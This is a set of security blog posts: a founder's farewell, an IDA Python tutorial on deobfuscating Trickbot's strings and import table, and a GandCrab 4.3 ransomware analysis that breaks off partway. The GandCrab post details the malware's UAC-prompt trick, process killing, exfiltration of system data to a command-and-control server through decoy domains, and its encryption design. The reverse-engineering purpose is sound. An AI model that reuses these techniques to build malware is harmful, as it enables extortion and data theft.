A Chapter Closes

When we registered the domain cyber.wtf, G DATA Advanced Analytics (ADAN) was only Marion, Jan, and me. Our sole offer was malware analysis and we were sharing an office that had been vacated by G DATA’s security labs and was scheduled for a thorough workover later that year. That was almost exactly six years ago.

:~$ whois cyber.wtf
Domain Name: cyber.wtf
Creation Date: 2016-02-25T10:00:20Z
Registry Expiry Date: 2022-02-25T10:00:20Z

A few months back, I had accepted the task to build a security service provider under the roof of an AV company. ADAN has grown quite a bit over the years in terms of people and portfolio, and G DATA has changed and grown as well. It’s been quite a ride and I’d like to thank everyone who supported our cause and who lent me and my colleagues their ears, heart, and brain over the years. At the end of February I’ll resign from my role as founding CEO of G DATA ADAN.

All the best,
Tilman

Using IDA Python to analyze Trickbot

Introduction

When analyzing malware, one often has to deal with lots of tricks and obfuscation techniques. In this post we will look at several obfuscation and anti-analysis techniques used by the malware Trickbot, based on the sample 8F590AC32A7C7C0DDFBFA7A70E33EC0EE6EB8D88846DEFBDA6144FADCC23663A from mid of December 2018.

After analyzing and understanding the obfuscation techniques, we will take care of deobfuscating the malware with IDA Python in order to make the code easier to analyze in Hexrays’ decompiler.

Related Work

With a malware as wide spread and publicly known as Trickbot, there is already a lot of research. Some intersections with this article can be found in the work of Michał Praszmo at https://www.cert.pl/en/news/single/detricking-trickbot-loader/, where some of the obfuscation features are touched. A similar, but more in-depth analysis from Hasherezade can be found at https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/ in conjunction with the tutorial on https://www.youtube.com/watch?v=KMcSAlS9zGE. Also Vitali Kremez explained the string obfuscation of a Trickbot sample at https://www.vkremez.com/2018/07/lets-learn-trickbot-new-tor-plugin.html

Obfuscated Import Address Table

If you put the unpacked binary in IDA, you can see that Trickbot has several imported functions:

1

Yet, the first line of the decompiled wWinMain() shows lots of function calls relative to the address stored at dword_42A648.

2

Looking at the x-refs of this address, we can find out in which context it is written to:

3

Decompiling the function sub_402D30 () shows that dword_42A648 points to a buffer of 0x208 bytes (or 129 DWORDs). The buffer is modified in the same function with a call to sub_40C8C0().

4

Note that stru_42A058 holds a pointer to a structure which we will get to know in the following function, as it is an argument for the function call to sub_40C8C0(). This call is done 8 times in a loop as you can see in line 21 to 27.
Within sub_40C8C0() Hexrays’ decompiler shows the following picture:

5

We can see the following things:
The argument called “hModule” by IDA is a pointer to a structure. Its first DWORD contains a hint to a string used in LoadLibraryW() in line 12 and 13.

The second DWORD of the structure is used in line 14, 16, 18 and 21 and contains a list of hints to function names used in GetProcAddress().

The third DWORD of the structure is used to mark the end of the list of the second DWORD in the for-loop in line 16.

The fourth DWORD of the structure is used in line 15, 16 and 20 and points to a list of offsets, which is used to calculate the address to store the imported functions, with the base of our previously allocated 0x208 bytes array.

Putting it all together, our structure is defined as follows:

struct IATstruct
{
DWORD offsetForDecryptionDLLname;
DWORD offsetForDecryptionImportNamesArrayStart;
DWORD offsetForDecryptionImportNamesArrayEnd;
DWORD IAToffset;
};

Now our function looks much nicer:

6

It is now obvious that our mysterious buffer of 0x208 bytes is actually an IAT which is stored on the heap. The pointer to the IAT is located at dword_42A648 and the 383 x-refs to this address which we saw in the beginning are mostly calls to this IAT.

Decrypt All Strings

Now the question remains, what the functions sub_407110() and sub_405210() are doing to yield library- and function names. When disassembling them, you can see that both call sub_40E970(). Only the first one, sub_407110(), has an additional call after that, but that is only used to transform a string to a wide string:

So the actual magic happens in sub_40E970():

9

We see a single call to sub_404080(). But most important is the first function argument, which adds a1 to the base address of the label which IDA called “Src”. Looking at Src, we can see it is a table with offsets to some scrambled strings:

10

So the argument a1 is simply an offset to the table pointed to by Src and decides which of the strings is provided to sub_404080().

When looking at sub_404080(), we can see a function which has over 100 lines of disassembled code. I just chose the most relevant part to display in a screenshot:

11

Without going too much into details, you can see that from line 44 to 63 a substitution takes place based on the first function argument (copied to “Dst”) and the string pointer named off_42A050 by IDA in line 44. The string looks like this:

12

From line 64 to 69 the previously substituted bytes are then mangled by some bit operations, where four input bytes are mapped to three output bytes. According to the blog of Vitali Kremez mentioned above, this was once a base64 algorithm with a custom alphabet. It still is similar to that, but is seems to be extended by the bit manipulation operations.

Putting it all together, we now know that each string of the IAT is scrambled by a substitution cipher and a bit manipulation algorithm. The function arguments provided in the functions sub_407110() and sub_405210() from the IAT algorithm described previously are offsets to string pointers to the scrambled strings stored at 0x00427C1C, called “Src” by IDA.

We also know that sub_407110() returns a wide string, while sub_405210() returns an ANSI string.
When cross referencing those two functions, we can see 159 and 52 calls to them:

1314

Looking at the calls, we can see that the argument, which describes the string offset, is pushed on the stack as second function argument, in our case 73h. The pointer to the output string is the first argument:

15

Looking a bit further, we can find a third function sub_4019F0(), which calls sub_40E970() for decrypting strings. Again, the argument is provided via a push of a constant number.

So we can write a simple IDA python script to decrypt all strings and print them. The algorithm is quite simple:

  1. Manually identify all three functions which call sub_40E970()
  2. For each xref to one of those three functions:
    1. Disassemble backwards until we find the first push which is a number
    2. Add the base address of the crypted string table to find the referenced string
    3. Decrypt the string based on the reversed algorithm

The output looks like this (note that line breaks are not encoded, but do actually break the lines):

16

We can also adapt our algorithm to print us the import address table, since we know the structure used in sub_40C8C0() to build the IAT:

  1. Take the pointer at stru_42A058
  2. Convert the values stored there into an array of the structure “IATstruct” (described previously) with eight array elements
  3. For each of those eight elements:
    1. Decrypt the first DWORD as DLL name
    2. Iterate from second to third DWORD and decrypt them to get all imported function
    3. Take the fourth DWORD as an offset where the function is placed on our IAT on the heap

Printing the IAT as a dictionary looks like this:

17

Setting Comments to Decompilation

One thing that always bugged me is that it is trivial to add comments in the disassembly in IDA. But since I use the decompiler a lot, I wanted to add my decrypted strings as comments in the decompiler view.

After rather unsatisfying google searches, I spent hours in IDA’s API documentation, read a bunch of existing IDA plugins to look for hints and tried out a lot. Turns out my IDA 6.9 is very crashy when working with IDA Python and also the documentation is not always as helpful as one would like it to be.

But I finally succeeded with a lot of try and error and a little bit of brute forcing:
First you need to translate the address of the disassembly to the function line of the decompiled code. Then by using a ctree object, you can place a comment there. Unfortunately, the ctree object needs to have the correct “item preciser” (ITP). An ITP specifies if a comment is e.g. placed in a line of an “else”, “do”, “opening curly brace”, and so on.
If you set the incorrect ITP to your ctree object, your comment is “orphaned” and won’t be placed correctly.

I still do not understand how I know which ITP I should use, so I developed a little brute force algorithm:

  1. Delete all orphaned comments from current function
  2. For each possible ITP:
    1. Set comment with current ITP
    2. If no orphaned comment exists, break loop

This algorithm is rather stupid. But after spending too much time on this issue, I was finally happy to have something that works.

The result looks like this:

18

Setting Function Information

Being able to decrypt all strings and setting them as comments in the decompiled code helps a lot when reversing the binary. What is missing is a properly useable IAT. We already know that the IAT is constructed during runtime on the heap.

Function calls to the IAT look like this:

19

The first two lines of the decompilation look as follows in the disassembly:

20

You can see in the first line that dword_42A648 is copied to eax, and eight lines later the offset 0xBC is added until a call to register ecx is executing the WinAPI call. The last five lines show a second WinAPI call in a simpler fashion, with only one function argument.
The mov instructions in line five to eight are irrelevant for the function call, but the compiler decided to put them between the three pushes for the function arguments of the first call anyways.

The idea of how to fix this is quite simple. Yet, the implementation of the idea turned out to be way more complex:
We write a light weight implementation of a taint tracker and track the usage of dword_42A648, which holds a pointer to the IAT, to find all WinAPI calls. For each call, our taint tracking provides us the offset within the IAT, so we know which WinAPI is called. In our previous example, we would start with eax, which gets a copy of dword_42A648. Then track eax until it is copied to ecx with the offst 0xBC. Then we track ecx until we see a call to ecx. Thus we know that the IAT offset 0xBC is used at this specific call.

In order to tell IDA what kind of return value and parameters each IAT call has, we need to do some more magic. First, we need to import all function definitions we need. E.g. for “SetCurrentDirectoryW” we need to define a function like this “typedef BOOL __stdcall SetCurrentDirectoryW(LPCWSTR lpPathName);”. We import those function definitions as local types in IDA.

In the second step, we create a local structure which reflects our IAT. So instead of only naming the pointer e.g. “CreateThread”, we also use the type CreateThread, which we imported as local type.

21

This IAT structure is then applied to the address dword_42A648, so we can see which function is called when dword_42A648 is referenced. The decompilation of e.g. sub_402B00 then looks like this:

22

We can see three calls to WinAPIs and their corresponding names in line 18, 31 and 34. Yet, neither the number of function arguments are correct, nor are their types identified properly. For example, in line 18 IDA shows five function arguments where there should be four and in line 31 there is one where there should be three.

Additionally, the structure PSECURITY_DESCRIPTOR is not set as the third argument in line 18, instead IDA set it to void*. And instead of LPSECURITY_ATTRIBUTES, IDA uses an int* in line 31.

In order to fix this, we can now leverage our taint tracking information and define each call with its corresponding function by using the IDA Python functions apply_callee_tinfo() and set_op_tinfo2() of the idaapi. This triggers IDA’s magic and populates the added information to the disassembly, so that even stack variables are redefined and renamed.

23

We can now see that the function calls have the correct number of arguments as well as the correct types of arguments. Also the stack variables got redefined and renamed correctly.

You always know you are going down a very dark trail when the IDA Python functions you are using have less than 10 hits on google and most of those hits are just copies of the same text.
Yet, I found the existing IDA Python script “apply_callee_type.py” from Jay Smith on https://github.com/fireeye/flare-ida/blob/master/python/flare/apply_callee_type.py extremely helpful in understanding how to do such magic in IDA.

The final pseudo algorithm looks like this:

  1. Iterate over the decrypted IAT and for each imported function:
    1. Look up function definition in IDAs database
    2. Import function definition to local types for later use
  2. Create IAT structure and import it as local type called “IAT”
  3. Set dword_42A648 as type “IAT”
  4. For each read-reference to dword_42A648
    1. Get the register which holds dword_42A648
    2. Disassemble forward until the register is copied with an offset to a new register, remember the used offset
    3. Disassemble forward until the new register is called, remember this address
    4. Depending on the used offset, look up the function definition of the IAT function
    5. Apply function definition to current address

Conclusion

In the first part we have learned how Trickbot obfuscates its strings and how we can leverage static code analysis in order to deobfuscate the strings and put them in a useable format in IDA.

In the second part we analyzed how the dynamically created import address table of Trickbot can be restored and how IDA can be instrumented to process the data types of the imported functions to get a nice and clean decompilation result.

Finally, I would like to thank my colleagues from G DATA Advanced Analytics for proofreading this article.
Additionally, I would like to thank the Trickbot authors for the interesting and partially challenging malware.

You can find the IDA Python scripts on https://github.com/GDATAAdvancedAnalytics/IDA-Python

Dissecting GandCrab Version 4.3

Introduction

GandCrab is a ransomware that has been around for over a year and steadily altered (I explicitly do not say “improved”) its code. The author(s) version their builds, the version I analyzed in this blog post is GandCrab’s interal version 4.3 with the Sha256 c9941b3fd655d04763721f266185454bef94461359642eec724d0cf3f198c988.

1

GandCrab has been around for a while, but gained relevance for us, when we received incoming requests for incident response engagement, primarily from medium-sized companies. On the 24th of August 2018 GandCrab started to push some e-mail based campaigns against German speaking countries, as already described by our esteemed colleague Hauke here https://www.gdata.de/blog/2018/09/31078-professionelle-ransomware-kampagne-greift-personalabteilungen-mit-bewerbungen-an (G DATA’s corporate blog is typically obfuscated in German).

In the meantime Bitdefender released a tool to decrypt several variants of GandCrab, including the analyzed one https://labs.bitdefender.com/2018/10/gandcrab-ransomware-decryption-tool-available-for-free/

To the best of our knowledge, the tool does not use any flaw in the encryption of GandCrab, but it uses a copy of the master private key, which can be used to revert the whole encryption. Details on how the encryption is done by GandCrab can be found later on in this article.

 

Motivation

We analyzed GandCrab as needed, when initially starting with the analysis, we had about  zero knowledge about the internal details of GandCrab. This article is meant as a walkthrough of the analysis process, with some focus on the execution flow of GandCrab, as well as the analysis of the kernel driver exploit comprised in this sample. As we are documenting in retrospect, various blog posts on GandCrab already exist that document its features, tricks and oddities. You can find a very good feature comparison and timeline here https://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/, you can find an additional timeline, a few details about the kernel driver exploit added in version 4.2.1 as well as an explanation of the latest feature of each version here https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html

Starting the analysis

Unpacking

The step of unpacking the sample will be skipped here, as it takes around 30 seconds if you have the correct setup and know what you will expect in the unpacked form. At our first encounter with the sample, we didn’t know what to expect, so it took us a few minutes.

Removing the junk code

When putting the sample into IDA, you are first greeted by a scrambled main function, which trips IDA a bit up.

2

After rolling my eyes and being afraid I had not unpacked the sample properly, I looked at some random functions identified by IDA and noticed, that most of the code looked readable, but several functions also had the same anti-disassembling trick.

Hoping to see a cool VM packer or some advanced obfuscation tricks, I started to analyze the junk code, which starts at the first call in line number 3.

Obviously, the two conditional short jumps two instructions later point to a location which was not properly disassembled by IDA. After fixing the disassembly of the jump target, the code looks like this.

3

So, reading the disassembly, we have a call, which only pushes the return address on the stack. This return address, being the topmost stack element, is then increased by 0x11. In the next step, depending on the state of the ZF bit (or simply “zero flag”), either the JNZ or the JZ condition triggers and jumps to the pop eax, jmp eax instructions, which pop the altered return address from the stack and jump to it. Disassembling the jump target two bytes after the jump itself yields us the following result:

4

We can see that the jmp eax leads us to the call to address 0x40414B. Since afterwards the ExitProcess is called, we can assume that 0x40414B is the main function of GandCrab. Disassembling this function in IDA looks like this:

5

Well, we’ve seen this byte sequence at the function prologue somewhere before…

In case you’re only reading the text and not really looking at the pictures, you might have missed that the function prologue is not only looking the same for both functions we have seen so far, but it is the very same byte sequence.

Also, IDA did not notice that a new function starts at address 0x40414B, which is why it placed the “loc_40414B” label there.

After succeeding in decompiling the function when simply NOPing out the junk instructions by hand, I wrote a short IDA python script to patch all locations where the junk instructions where:

import idaapi
tmp = "E8 00 00 00 00 3E 83 04 24 11 75 05 74 03 E9 28 14 58 FF E0 00 E9"
patchbytes = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

cur = 0
while  cur != 0xffffffffL:
  cur = FindBinary(0, SEARCH_DOWN, tmp)
  print hex(cur)
  idaapi.patch_many_bytes(cur, patchbytes)

The Python script prints each location where it patched something, so I could then check if IDA detected this location as the start of a function and test if I could decompile it. Of course, defining a function could also be done by a script, but for 29 functions, this was still doable by hand, and the IDA API is also not the most intuitive API to use when you’re in a bit of a hurry.

So yep, patching was rather trivial, as Fortinet confirmed:https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html

Following the execution flow

After a few small hurdles described before, we can start looking at GandCrab and analyze the execution flow step by step.

Before doing so, here is a reference of what we’re going to see and which functions calls which one. Since there will be a lot of function calls and returns, it is easy to get lost, so take this as a reference (maybe put it on a second screen, print it, open it in a second tab, …) while you’re reading the rest of this article:

main
----Eleveate Privileges
----closeRunningProcesses
----mainFunction
--------bIsSystemLocaleNotOk
--------bCheckMutex
--------decryptPubKey
--------0x00401C56
--------0x00405B7D
--------encRC4
--------internetThread
------------0x004047BD
------------contactCnC
--------startEncryption
------------decryptFileEndings
------------createRSAkeypair
------------saveKeysToRegOrGetExisting
----------------getKeypairFromRegistry
----------------encrypPubKey
--------------------getRandomBytes
--------------------importRSAkeyAndEncryptBuffer
----------------writeRegistryKeys
------------createUserfileOutput
------------concatUserInfoToRansomNote
------------startEncryptionsInThreads
----------------encryptNetworkThread
--------------------enumNetworksAndEncrypt
------------------------loopFoldersAndEncrypt_wrapper
----------------------------loopFoldersAndEncrypt
--------------------------------...
----------------prepareEncryption
----------------encryptLocalDriveThread
--------------------loopFoldersAndEncrypt
------------------------0x0040512C
------------------------0x004053FD
------------------------0x00405525
------------------------encryptFile
----------------------------bIsFileEndingInBlacklist
----------------------------bIsFilenameOnBlacklist
----------------------------encryptionFunc
--------------------------------...
--------deleteShadowCopies
----AntiStealth
----deleteSelfWithTimeout

We’re beginning at what I call the main function at 0x0040414B. It starts very simple:

6

The first function call to a function named “nullsub_1” by IDA is, as the name already implies, nothing interesting:

7

Those kinds of functions are often generated by compilers if you remove the content of a function by preprocessor directions like “#ifdef DEBUG”. I suppose the author(s) of GandCrab either placed some debug string or breakpoint there when compiling the debug version. And since we are looking at the release compilation, the function is empty.

Elevating privileges

The next part of the main function is a simple check if the sample is running on Windows Vista or newer. If so, GandCrab checks if the current process is running with integrity level low or even lower. If that is also the case, a very cheap but simple trick is used to gain normal user privileges:

8

By calling the WinApi ShellExecuteW with “%windir%\system32\wbem\wmic” as “lpFile” parameter, “runas” as “lpVerb” parameter and “process call create \”cmd /c start %s\”” as “lpParameters”, GandCrab starts a process that asks the user to execute a command line with normal user privileges, which in turn starts GandCrab from the command line. After the new process is started, the initial process ends itself by calling ExitProcess(0).

As you can see in the first lines of the screenshot, GandCrab obfuscates the strings by filling the wchar array during runtime with mov instructions. This is also a well-known trick for string obfuscation.

Given the distribution methods of GandCrab, where also Exploit Kits are used, this kind of functionality makes sense: Most exploit kits nowadays only deliver exploits to gain code execution via bugs in browsers or browser plugins. And all major browsers try to sandbox their worker processes in low or even zero privileged process containers. So, a successful exploit against a modern browser will initially run with low or zero integrity level, unless a second exploit is fired to elevate the processes privileges.

GandCrab goes the easy way and instead of firing a privilege escalation exploit, it simply asks the user for more privileges, but does this in a very sneaky way. Those user level (aka. medium integrity) rights are needed to later encrypt the user’s files.

9

In the above screenshot you can see what happens if you run GandCrab on a German Windows 8 with low integrity: The UAC dialogue pops up.

You might have noticed that the whole privilege escalation is wrapped in a loop with 100 tries, which makes it very dangerous for average users. You either have to click “No” 100 times, or you execute GandCrab with medium integrity.

Ensuring File Access

So GandCrab either already has enough privileges, or it tries to start a new process with enough privileges with the user’s help. In any case the execution flow then goes back to the main function, where the next call to 0x00403F7D, a function which I named “closeRunningProcesses()”, takes place.

10

First, GandCrab fills an array, called lpString1 by IDA in the screenshot, with string pointers. Then, by using the CreateToolhelp32Snapshot API with the TH32CS_SNAPPROCESS flag, it iterates over all running processes and checks each process name against the list in the lpString1 array. Each matching process is being opened and terminated, if GandCrab gets the according process handle.

The full list of process names is:

msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exeisqlplussvc.exe, xfssvccon.exe, sqlservr.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exeagntsvc.exe, agntsvc.exeencsvc.exe, firefoxconfig.exe, tbirdconfig.exe, mydesktopqos.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, sqlservr.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe

Using my favorite open source intelligence tool, called Google, and searching for some of those process names, you can find a list from a Cerber sample which around two years ago did the very same thing. https://www.bleepingcomputer.com/news/security/cerber-ransomware-switches-to-a-random-extension-and-ends-database-processes/

The only difference is, that the list of Cerber has less entries. Yet, GandCrab seems to have copied the exact list. Even the order of items is nearly the same. GandCrab only added some entries at the end of the list.

The reason for this feature is as follows:
Those processes might have open handles on important files, which might block GandCrab in getting a writeable handle on those files when trying to encrypt them. So it kills those processes to ensure it can access the files which otherwise might be blocked.

The MainFunction

Once GandCrab has ensured that a bunch of processes have been killed, the execution flow goes from the main function to a function which I called mainFunction at 0x0040398C. It might not have been my brightest idea to name the first function “main” (0x0040414B) and one of the following sub-functions “mainFunction” (0x0040398C), but let‘s stick with it for now.

In this function most of the GandCrab functionality takes place. Anti-Debugging/Emulator/Sandbox tricks, gathering and sending telemetry to the C&C, threading, encryption, as well as taunting IT security companies.

As this function is a bit bigger, I cut the screenshots in parts to explain the single steps.

GandCrab does not like Emulators and Sandboxes

We start with a simple Anti-Emulator/Sandbox trick: By Calling OpenProcess() with invalid arguments, and a subsequent check for the error code, GandCrab ensures that no one is fiddling with the OpenProcess-API. Some simple emulators or sandboxes might always return “success” and will thus not set the expected error code, which is probably what this part is trying to detect.

11

GandCrab is afraid of Russians and Cyrillic keyboards

In bIsSystemLocaleNotOk() at 0x00403528, GandCrab looks if a Russian keyboard is installed, or if the system’s default UI language is on the internal blacklist. In both cases GandCrab stops its execution and deletes itself from the system by calling deleteSelfWithTimeout() at 0x004032CE.

12

13

There can be only one GandCrab

The next check in bCheckMutex() at 0x00403092 tries to avoid that several instances of GandCrab run at the same time. By creating a named mutex via CreateMutexW() and subsequently checking for the error codes ERROR_ACCESS_DENIED and ERROR_ALREADY_EXISTS, it ensures that the mutex is created and the function fails if the mutex already exists.

14

With the mutex name, GandCrab starts its first taunt against Ahnlab. According to https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html, the text in the picture behind the link in the string buffer translates to “I added you to my gay list. I used a pencil for the time being“. Since I don’t speak Russian, you have to take Fortinet’s word for the translation.

Shipping its own public key

With the next call to decryptPubKey() at 0x004038DA, a public key stored in the .data section is decrypted. The decrypted key is put on heap memory and the pointer to the memory stored in a global variable for later use.

15

The public key is first XORed with 5 and afterwards decrypted with the Salsa20 stream cipher. The decryption key for the stream cipher is a greeting to the inventor of the Salsa20 algorithm, Daniel Bernstein, who is also addressed by his Twitter handle @hashbreaker.

Im in ur machine, stealing ur infoz

In the next two subsequent calls to 0x00401C56 and 0x00405B7D (not shown in any screenshot), GandCrab initializes an internal structure and then fills it with information about the current system.

Most of the data in this structure is organized in groups of three. The first element is a boolean value set during initialization of the structure which controls if the next two elements are used. Those next two elements are a static name set during initialization and a value calculated during runtime (think of it like a key/value pair in JSON).
E.g.

DWORD bShouldFillDomainName; //set to 0/1 during initialization
DWORD pc_group; //static name
DWORD domainName; //calculated during runtime

By using this format, GandCrab can read the following information from the target computer, if configured to do so:

  • User Name
  • Computer Name
  • Domain Name
  • Installed AV Product
  • Keyboard Locale
  • Windows Product Name
  • Processor Architecture
  • Volume Serial Number
  • CPU Name (as defined in HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0)
  • Type of each attached drive (as defined by GetDriveTypeW())
  • Free disk space of each attached drive

Additionally, a “ransom_id” is calculated by getting the ntdll.RtlComputeCrc32() of the CPU name with the initial CRC 666 as seed, transforming this DWORD into a string and then concatenating the volume serial number of the volume on which Windows is installed.

The whole structure of stolen information is then serialized into a string in the form of  “key1=value1&key2=value2[…]” and then two IDs are added, as well as the version information.

Afterwards the whole string is encrypted with RC4 and the static key “jopochlen” in 0x00404B66, which I called encRC4.

16

In between those string concatenation functions, you can see another mock of Ahnlab: GandCrab claims to have a possible write-what-where kernel exploit with a privelege[sic] escalation for their security suite Ahnlab V3 Lite. You can read about the analysis of this exploit later in this article.

GandCrab home phone

Once the information about the infected system has been gathered, a thread is started which pushes this information on the C&C server, starting at 0x004048D7, called internetThread().

This part is rather weird, but very effective in regards to network based IDS/IPS as well as sinkholing attacks against the C&Cs of GandCrab.

17

It starts with GandCrab decrypting a huge char array with the previously seen XOR algorithm.

As this blob is very huge, I’m not showing it here. It contains 960 different domains and IPs separated by a semicolon. For each of those domains/IPs the function 0x004047BD is called. In this function, several randomized strings are generated, which form a random path for the C&C URI.

18

The first random string is one of those seven. The seed of the randomness is based on GetTickCount().

19

The second random string is chosen from one of the eight strings shown above.

20

The third string is built a little bit more complex. From a pool of 16 two-char strings, one is chosen randomly. Then, depending on further random numbers, between zero and five more times a random string from the same pool is concatenated. The result is later used as file name in the URL’s path.

21

The fourth and last random string is one of the four file name extensions shown above (since the char* array from the first random string is re-used for the fourth random string, the offset starts at 3 instead of 0, which looks odd in the screenshot).

Then, with the call to wsprintfW(), the URL is built and the function contactCnC() at 0x00404682 is called, which ultimately sends the gathered system information to the C&C server.

In contactCnC() there is not too much interesting to show. The already serialized and RC4 encrypted system information is accessed via a global variable (which is why you can’t see it as an argument in the above screenshot) and is then getting base64 encoded before being transmitted.

Before sending the information to the C&C server as multipart/form-data in a POST-request, GandCrab first contacts the domain with a GET request to decide on the HTTP status code (30x), whether the server should be contacted with HTTP or HTTPS.

What GandCrab does is actually easy to describe, but it poses a few problems for defenders and analysts. Most of the domains/IPs contacted by GandCrab are benign websites from real companies or organizations. So, I assume that GandCrab either sneaked at least one of their C&C domains/IPs in there, or GandCrab compromised one of those legit websites to receive C&C traffic. We didn’t follow up on that aspect so far.

By sending the stolen information to several hundred of domains/IPs, it is hard to block the C&C communication based on domains/IPs, because you would block a lot of benign websites, too.

If you use a network-based IDS/IPS, it is also not trivial to detect or block GandCrab traffic based on the URL, since there are a lot of randomizations in there and it is not easy to tell those URLs apart from legit URLs.

Encrypt ALL the things!

22

After starting the thread that calls the C&C server, the mainFunction() initializes three critical sections, of which only one is used at all. O_o

Then, with a call to the function startEncryption() at 0x00402E60 the actual encryption of files on the system starts.

23

In the first call to decryptFileEndings() at 0x00402E14 a list of file endings is decrypted with the already known XOR loop. This list is later used to exclude files from encryption based on their file ending.

The excluded file endings are:

.ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .lock .hlp .ldf .icl .icns .ico .ics .lnk .key .idx .mod .mpa .msc .msp .msstyles .msu .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .themepack .exe .bat .cmd .gandcrab .KRAB .CRAB .zerophage_i_like_your_pictures

As a second step in createRSAkeypair () at 0x00404BF6, a 2048 bit RSA keypair is created. This keypair is then put into to the function I called saveKeysToRegOrGetExisting() at 0x00402B85.

24

Here are two branches: If the registry path “HKCU\SOFTWARE\keys_data\data” exists, the previously generated keypair is thrown away – WTF? Why generate it in the first place? –  and the registry keys “private” and “public” are read from said path via getKeypairFromRegistry() at 0x0040298D and used further on. Please note that the registry name “private” is actually not only the private key, but a slightly more complex buffer, as you can see when looking at the second branch, in case the registry path does not exist.

The second branch is executed if the registry path does not exist. A call to encrypPubKey() at 0x00402263 is executed.

25

First a random IV and a random key are generated – getRandomBytes() uses advapi32.CryptGenRandom(), so it is probably really random and not some pseudo random rand() function.

Those two random values are then used to encrypt the private key with Salsa20.

The function importRSAkeyAndEncryptBuffer() imports a public RSA key and uses it to encrypt the provided buffer. Note that not the previously generated public key is used here, but the g_Mem_pubkey, which was decrypted in the beginning of the main function.

In order to understand what is actually encrypted by importRSAkeyAndEncryptBuffer() it is important to know how the structure behind the outBuf pointer looks like, so here is my IDA Local Type definition:

#pragma pack(1)
struct keypairBuffer
{
DWORD privkeySize;
char salsaKey[0x100];
char IV[0x100];
char privKey[0x100];
}

You can now see that all 0x100 bytes starting at keypairBuffer->salsaKey and all 0x100 bytes of keypairBuffer->IV are encrypted.Although the key is only 32 bytes and the IV only 8 bytes long, if you look at the first argument of getRandomBytes(). GandCrab still encrypts the whole buffer, including lots of unused null bytes. ¯\_(ツ)_/¯

Yet, this means, that without the private key of the embedded g_Mem_pubkey, you cannot decrypt the Salsa20 key and IV. And without this Salsa20 key and the IV, you cannot decrypt the locally generated private RSA key.

Unfortunately, this looks like solid use of cryptography to me.

Of course with a call to writeRegistryKeys() at 0x00402AAD the public key of the previously generated RSA keypair is written to the registry key “public” and the whole encrypted keypairBuffer structure is written to the registry key called “private” in the above mentioned registry path.

Back in the startEncryption() function, as a next step the memory of the generated private RSA key is freed in order to avoid having it in clear text in memory during runtime.

Then, with a call to createUserfileOutput() at 0x004023CF, a part of the GandCrab ransom note is generated. The encrypted keypairBuffer is base64 encoded and by using a global variable the RC4 encrypted and base64 encoded system data previously generated in the mainFunction() are concatenated with the following strings:

---BEGIN GANDCRAB KEY---
<base64(RSAencrypted(keypairBuffer))>
---END GANDCRAB KEY---
---BEGIN PC DATA---
<base64(RC4(systemData))>
---END PC DATA---

With the subsequent call to concatUserInfoToRansomNote() at 0x00402C36 the rest of the ransom note is decrypted with the same XOR loop as before, but this time 0x10 is used as XOR key.

Within this text the placeholder {USERID} is searched and substituted with the previously mentioned “ransom_id” (CRC32 over CPU name + Windows volume serial number). The {USERID} string is part of the path parameter of the URL of GandCrab’s hidden service: “http://gandcrabmfe6mnef.onion/{USERID} “

Thus, each machine infected with GandCrab gets a unique ransom note, where the link includes the identifier of the infected machine. Additionally, the ransom note holds all information needed to decrypt a file, if you have the private key belonging to the public key that is stored within GandCrab’s .data section.

It is funny to note that in concatUserInfoToRansomNote() not the already calculated and known ransom_id is used, but the whole previously mentioned internal structure containing information about the current system is built again. Only this time all but one of the bShouldFillDomainName bits are not set. So, the needed values are read and calculated a second time.

By calling startEncryptionsInThreads() at 0x0040211E, GandCrab starts several threads which take care of the encryption:

26

The first thread starts at the function encryptNetworkThread() at 0x00402097, which will be described in the next subsection.

27

Then, by calling prepareEncryption() at 0x00401D84, the driveInfos structure gets filled, containing the number of processors minus one (minimum one), the number of drives to encrypt and a list of drives to encrypt.

The list of drives to encrypt is filled by iteratprovides
ing over the alphabet (from A to Z), calling GetDriveTypeA() for each letter and checking if the drive type is DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_CDROM or DRIVE_RAMDISK. This specifically excludes all drives of type DRIVE_REMOTE, which should be already handled by the thread running encryptNetworkThread().

Back in startEncryptionsInThreads(), after prepareEncryption() has been executed, you can see in the for-loop for each drive, addressed by its drive letter, number of processors minus one threads are spawned, which call the encryptLocalDriveThread() function at 0x00401D1C, which will be described in one of the following subsections.

The main thread then waits for all threads running on the current drive to finish by calling WaitForMultipleObjects(). As soon as one drive is finished and all according threads end, the next drive is encrypted with the same number of threads, and so on.

At the end of the function, the main thread waits until the encryptNetworkThread()-thread has finished by calling WaitForSingleObject().

Network encryption – Im in ur network, encrypting ur sharez

The encryptNetworkThread() function at 0x00402097 does nothing more than resolving the computer’s name and providing this information to the function I called enumNetworksAndEncrypt() at 0x00401EA2 together with the crypto keys which were provided in the threadArgs structure.

28

It is weird to see that the computer name is not actually used in the enumNetworksAndEncrypt() function. So maybe it was once used and the authors forgot to remove it, or it is part of an upcoming feature, which is still in development. Nonetheless, from the control flow point of view it makes no sense to query the computer name here. ¯\_(ツ)_/¯

So the actual beef we are looking for is in the function enumNetworksAndEncrypt().The main part of this function looks like this:

29

The function has two parts, the upper half and the lower half, each marked by a call to WNetOpenEnumW().

In the first half, a maximum of 128 previously known network disks are enumerated by calling WNetOpenEnumW() with the RESOURCE_REMEMBERED and RESOURCETYPE_DISK arguments.

